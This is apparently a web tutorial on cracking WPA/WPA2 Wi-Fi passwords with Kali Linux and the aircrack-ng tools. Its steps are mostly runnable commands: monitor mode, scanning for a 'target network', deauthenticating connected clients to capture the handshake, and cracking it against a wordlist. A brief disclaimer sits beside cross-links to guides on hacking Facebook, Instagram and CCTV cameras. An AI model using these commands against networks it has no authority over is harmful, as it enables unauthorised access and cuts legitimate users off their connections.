How to Hack WiFi Using Kali Linux ?

Warning !!!
Use the methods below for educational/test purposes only on your own Wi-Fi or with the owner's permission. Do not use it for malicious purposes.

Hack WPA/WPA2 WiFi Using Kali Linux

Hacking Wi-Fi sounds really cool and interesting. But it’s actually much easier to hack Wi-Fi with a good word list. But this list of the world is useless until we figure out how to actually use this list of words to crack the hash. And before we can crack the hash, we really need to generate it. So, below are these steps along with some good wordlists to hack Wi-Fi WPA / WPA2.

Also Read  How To Hack CCTV Camera ?

So, let’s boot Kali Linux. Open a terminal window and follow these steps.

Step – 1

ifconfig (interface configuration): To view or change the configuration of the network interfaces on your system.

ifconfig

Here,

  • eth0 – First Ethernet interface
  • l0 – Loopback interface
  • wlan0 – First wireless network interface on the system. (This is what we need.)

Step – 2

Stop current processes using the WiFi interface.

airmon-ng check kill

Step – 3

To run wlan0 in monitor mode.

airmon-ng start wlan0

Step – 4

To view all Wi-Fi networks around you.

airodump-ng wlan0mon

Here,

  • airodump-ng : For packet capturing
  • wlan0mon : Name of the interface

This name can be different on the different devices.

Also Read  How to Hack Facebook ?

Press Ctrl+C to stop the process when you have found the target network.

Step – 5

To view clients connected to the target network.

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon

Here,

  • airodump-ng : For packet capturing
  • -c : Channel
  • –bssid : MAC address of a wireless access point(WAP).
  • -w : The Directory where you want to save the file(Password File).
  • wlan0mon : Name of the interface.

To view clients connected to the target network.

Step – 6

Open a new terminal window to disconnect clients connected to the target network.

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon
  • aireplay-ng : To inject frames
  • -0 : For deauthentication
  • 10 : No. of deauthentication packets to be sent
  • -a : For the bssid of the target network
  • wlan0mon : Name of the interface.
Also Read  How To Hack Instagram Using Zphisher ?

When the client is disconnected from the target network. It tries to reconnect to the network, and when it does, you get a so-called WPA handshake in the previous terminal window.

We are now done capturing packets. So now you can close the terminal window.

Step – 7

Decrypt password. Open the Files app.

hacking-01.cap is the file you need.aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap

Here,

  • aircrack-ng : 802.11 WEP and WPA-PSK keys cracking program
  • -a : -a2 for WPA2 & -a for WPA network
  • -b : The BSSID of the target network
  • -w : Location of the wordlist file
  • /root/hacking-01.cap : Location of the cap file

You can download the shared passwords file from the internet, and if you want to create your own file, you can use the crunch tool.